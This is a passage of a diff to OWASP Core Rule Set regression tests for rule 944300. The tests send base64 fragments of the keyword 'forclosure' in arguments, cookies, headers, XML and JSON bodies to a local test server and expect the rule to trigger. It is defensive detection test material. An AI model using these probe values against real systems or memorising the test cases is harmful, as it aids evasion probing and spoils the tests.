test_title: 944300-106 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 106 desc: "XML element value includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Zm9yY2xvc3VyZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-107 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Zm9yY2xvc3VyZQ" + output: + log: + expect_ids: [944300] + - test_id: 107 desc: "Nested XML element value includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: 
"Zm9yY2xvc3VyZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-108 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Zm9yY2xvc3VyZQ" + output: + log: + expect_ids: [944300] + - test_id: 108 desc: "Content-Type text/plain includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Zm9yY2xvc3VyZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-109 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Zm9yY2xvc3VyZQ" + output: + log: + expect_ids: [944300] + - test_id: 109 desc: "Content-Type application/json arg value includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: 
"application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"Zm9yY2xvc3VyZQ\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-110 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"Zm9yY2xvc3VyZQ\"}" + output: + log: + expect_ids: [944300] + - test_id: 110 desc: "Content-Type application/json arg name includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"Zm9yY2xvc3VyZQ\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-111 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"Zm9yY2xvc3VyZQ\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 111 desc: "Argument test includes keyword GZvcmNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=GZvcmNsb3N1cmU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-112 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=GZvcmNsb3N1cmU" + output: + log: + expect_ids: [944300] + - test_id: 112 desc: "Argument name includes keyword GZvcmNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "GZvcmNsb3N1cmU=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-113 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "GZvcmNsb3N1cmU=test" + output: + log: + expect_ids: [944300] + - test_id: 113 desc: "Cookie test includes keyword GZvcmNsb3N1cmU" stages: - - 
stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=GZvcmNsb3N1cmU - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-114 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=GZvcmNsb3N1cmU + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 114 desc: "Cookie name includes keyword GZvcmNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: GZvcmNsb3N1cmU=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-115 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: GZvcmNsb3N1cmU=test + method: 
"POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 115 desc: "Request header test includes keyword GZvcmNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: GZvcmNsb3N1cmU - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-116 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: GZvcmNsb3N1cmU + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 116 desc: "XML attribute value includes keyword GZvcmNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-117 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + 
Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 117 desc: "XML element value includes keyword GZvcmNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "GZvcmNsb3N1cmU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-118 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "GZvcmNsb3N1cmU" + output: + log: + expect_ids: [944300] + - test_id: 118 desc: "Nested XML element value includes keyword GZvcmNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "GZvcmNsb3N1cmU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-119 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "GZvcmNsb3N1cmU" + output: + log: + expect_ids: [944300] + - test_id: 119 desc: "Content-Type text/plain includes keyword GZvcmNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=GZvcmNsb3N1cmU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-120 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=GZvcmNsb3N1cmU" + output: + log: + expect_ids: [944300] + - test_id: 120 desc: "Content-Type application/json arg value includes keyword GZvcmNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"GZvcmNsb3N1cmU\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-121 + - input: + dest_addr: "127.0.0.1" + 
port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"GZvcmNsb3N1cmU\"}" + output: + log: + expect_ids: [944300] + - test_id: 121 desc: "Content-Type application/json arg name includes keyword GZvcmNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"GZvcmNsb3N1cmU\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-122 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"GZvcmNsb3N1cmU\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 122 desc: "Argument test includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - 
data: "test=Bmb3JjbG9zdXJl" - output: - log_contains: "id \"944300\"" - - test_title: 944300-123 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Bmb3JjbG9zdXJl" + output: + log: + expect_ids: [944300] + - test_id: 123 desc: "Argument name includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bmb3JjbG9zdXJl=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-124 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bmb3JjbG9zdXJl=test" + output: + log: + expect_ids: [944300] + - test_id: 124 desc: "Cookie test includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: 
"en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Bmb3JjbG9zdXJl - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-125 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Bmb3JjbG9zdXJl + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 125 desc: "Cookie name includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Bmb3JjbG9zdXJl=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-126 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Bmb3JjbG9zdXJl=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 126 desc: "Request header test includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test 
agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Bmb3JjbG9zdXJl - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-127 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Bmb3JjbG9zdXJl + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 127 desc: "XML attribute value includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-128 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 128 desc: "XML element value includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - 
dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bmb3JjbG9zdXJl" - output: - log_contains: "id \"944300\"" - - test_title: 944300-129 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bmb3JjbG9zdXJl" + output: + log: + expect_ids: [944300] + - test_id: 129 desc: "Nested XML element value includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bmb3JjbG9zdXJl" - output: - log_contains: "id \"944300\"" - - test_title: 944300-130 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bmb3JjbG9zdXJl" + output: + log: + expect_ids: [944300] + - test_id: 130 desc: "Content-Type text/plain 
includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Bmb3JjbG9zdXJl" - output: - log_contains: "id \"944300\"" - - test_title: 944300-131 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Bmb3JjbG9zdXJl" + output: + log: + expect_ids: [944300] + - test_id: 131 desc: "Content-Type application/json arg value includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"Bmb3JjbG9zdXJl\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-132 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": 
\"Bmb3JjbG9zdXJl\"}" + output: + log: + expect_ids: [944300] + - test_id: 132 desc: "Content-Type application/json arg name includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"Bmb3JjbG9zdXJl\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-133 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: 